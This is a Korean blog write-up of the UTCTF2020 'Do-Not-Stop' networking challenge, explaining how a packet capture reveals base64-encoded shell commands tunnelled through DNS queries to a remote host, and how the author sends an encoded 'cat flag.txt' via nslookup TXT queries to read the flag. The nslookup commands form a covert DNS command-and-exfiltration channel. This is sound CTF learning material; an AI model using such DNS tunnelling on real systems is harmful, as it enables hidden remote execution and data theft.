일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
Tags
- 버퍼오버플로우
- Hackerschool
- HackCTF
- Linux
- SQL Injection
- Shadow 동아리
- RITSEC
- 리버싱
- 뉴스클리핑
- PWN
- Nop Slide
- BOF
- NewsClipping
- Next.js
- buffer over flow
- webhacking
- termux
- x64dbg
- 웹해킹
- RITSEC CTF 2019
- 어셈블리어
- ctf
- reversing
- 보안뉴스
- CodeEngn
- Python
- 리눅스
- writeup
- requests
- ftz
Archives
- Today
- Total
Jaeseo's Information Security Story
UTCTF2020 - [NETWORKING]Do-Not-Stop 본문
[NETWORKING]Do-Not-Stop
일단 문제 제목이 Do Not Stop 인 것을 보아 DNS
패킷에 대해 관심을 가져야 할 것 같습니다.
일단 패킷을 분석을 하면서 DNS 패킷을 분석 해본 결과 DNS Query를 통해 35.188.185.68에 base 64 형태로 Qeury를 전달하는 모습을 볼 수 있었습니다.
이때 응답값을 확인해보면
request 192.168.232.129 > 35.188.185.68 = d2hvYW1pCg== >> "whoami"
response 35.188.185.68 > 192.168.232.129 = cm9vdA== >> "root"
request 192.168.232.129 > 35.188.185.68 = bHMgLWxhCg== >> "ls -la"
response 35.188.185.68 > 192.168.232.129 =
dG90YWwgMjUxMgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IE1hciAgNiAwNDo0NCAuCmRyd3hyLXhyLXggICAgMSByb290ICAgICByb290ICAgICAgICAgIDQwOTYgTWFyICA2IDA4OjA5IC4uCi1ydy1yLS1yLS0gICAgMSByb290ICAgICByb290ICAgICAgICAgMTIyODggTWFyICA2IDA0OjQyIC5NYWtlZmlsZS5zd3AKLXJ3LXItLXItLSAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgIDEwNCBNYXIgIDUgMjM6NTAgRG9ja2VyZmlsZQotcnctci0tci0tICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICAgMTE5IE1hciAgNSAyMzo1MCBNYWtlZmlsZQotcnctci0tci0tICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICAgIDI4IE1hciAgNSAyMzo1MCBmbGFnLnR4dAotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAyNTMzODIzIE1hciAgNiAwNDo0NCBzZXJ2ZXIKLXJ3LXItLXItLSAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgMTY5MyBNYXIgIDUgMjM6NTAgc2VydmVyLmdv
\>> "total 2512
drwxr-xr-x 1 root root 4096 Mar 6 04:44 .
drwxr-xr-x 1 root root 4096 Mar 6 08:09 ..
\-rw-r--r-- 1 root root 12288 Mar 6 04:42 .Makefile.swp
\-rw-r--r-- 1 root root 104 Mar 5 23:50 Dockerfile
\-rw-r--r-- 1 root root 119 Mar 5 23:50 Makefile
\-rw-r--r-- 1 root root 28 Mar 5 23:50 flag.txt
\-rwxr-xr-x 1 root root 2533823 Mar 6 04:44 server
\-rw-r--r-- 1 root root 1693 Mar 5 23:50 server.go"
DNS 쿼리를 이용하여 원격코드 실행을 하는 모습을 볼 수 있었습니다.
위 내용을 바탕으로 flag.txt
의 내용을 확인 하는 payload를 전송 하기위해 아래처럼 내용을 작성 했습니다.
cat flag.txt >> "Y2F0IGZsYWcudHh0"
nslookup -type=TXT Y2F0IGZsYWcudHh0 35.188.185.68
이렇게 35.188.185.68 에 Query를 하면 응답이 없는 모습을 볼 수 있는데
다시한번 DNS 패킷을 확인 해보면 35.225.16.21에 dns.google.com의 IP를 질의를 하고 그 IP에 payload를 전송 하는 모습을 볼 수 있습니다. IP 주소가 변경 되었을 것이라 예상을 하고 query를 날려 IP를 알아봅니다.
nslookup -type=A dns.google.com 35.225.16.21
그 결과 3.88.57.227
라고 나오는데 이제 이 주소에 payload를 전송 합니다.
nslookup -type=TXT Y2F0IGZsYWcudHh0 3.88.57.227
응답이 "dXRmbGFneyRhbDF5X3MzTDFTX3NFNF9kTiR9" 으로 오고 이것을 decoding 하면 FLAG가 보입니다.
utflag{$al1y_s3L1S_sE4_dN$}
'Write UP > UTCTF2020' 카테고리의 다른 글
UTCTF2020 - [NETWORKING]Nittaku-3-Star-Premium (0) | 2020.03.09 |
---|---|
UTCTF2020 - [WEB]Shrek-Fans-Only (0) | 2020.03.09 |
UTCTF2020 - [WEB] spooky-store (0) | 2020.03.09 |
Comments